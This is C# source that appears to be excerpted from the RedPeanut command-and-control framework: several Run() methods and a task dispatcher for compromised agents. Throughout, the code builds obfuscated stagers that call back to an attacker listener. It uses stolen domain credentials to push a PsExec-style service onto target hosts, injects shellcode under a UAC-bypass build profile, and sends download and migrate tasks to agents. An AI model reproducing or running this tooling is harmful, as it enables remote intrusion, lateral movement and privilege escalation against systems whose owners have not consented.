private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
//Create TaskMsg gzip
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#SHELLCODE#", null)
.Replace("#USERNAME#", null)
.Replace("#PASSWORD#", null)
.Replace("#DOMAIN#", null)
.Replace("#PROCESS#", process);
string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
spawnprocess,
"RedPeanutSpawn",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
string binfilepath = Path.Combine(folderrpath, SHELLCODE_FOLDER, filename);
source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
.Replace("#NUTCLR#", null)
.Replace("#TASK#", null)
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#SHELLCODE#", Convert.ToBase64String(CompressGZipAssembly(File.ReadAllBytes(binfilepath))))
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain)
.Replace("#PROCESS#", null);
string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
spawnprocess,
"RedPeanutSpawn",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Error generating task");
}
}
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null)
{
switch (tasktype)
{
case "download":
FileDownloadConfig downloadconfig = new FileDownloadConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>(),
FileNameDest = destfilename
};
TaskMsg downloadtask = new TaskMsg
{
TaskType = "download",
DownloadTask = downloadconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
downloadtask.Instanceid = RandomAString(10, new Random());
}
else
{
downloadtask.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
downloadtask.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(downloadtask);
break;
case "migrate":
ModuleConfig migrateconfig = new ModuleConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
TaskMsg migratetask = new TaskMsg
{
TaskType = "migrate",
ModuleTask = migrateconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
migratetask.Instanceid = RandomAString(10, new Random());
}
else
{
migratetask.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
migratetask.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(migratetask);
break;
default:
ModuleConfig modconfig = new ModuleConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
if (agent.Managed)
{
modconfig.Assembly = assembly;
}
else
{
modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
assembly, RandomAString(10, new Random()) + ".exe", type, method, args)));
}
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
task.Instanceid = RandomAString(10, new Random());
}
else
{
task.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
break;
}
}
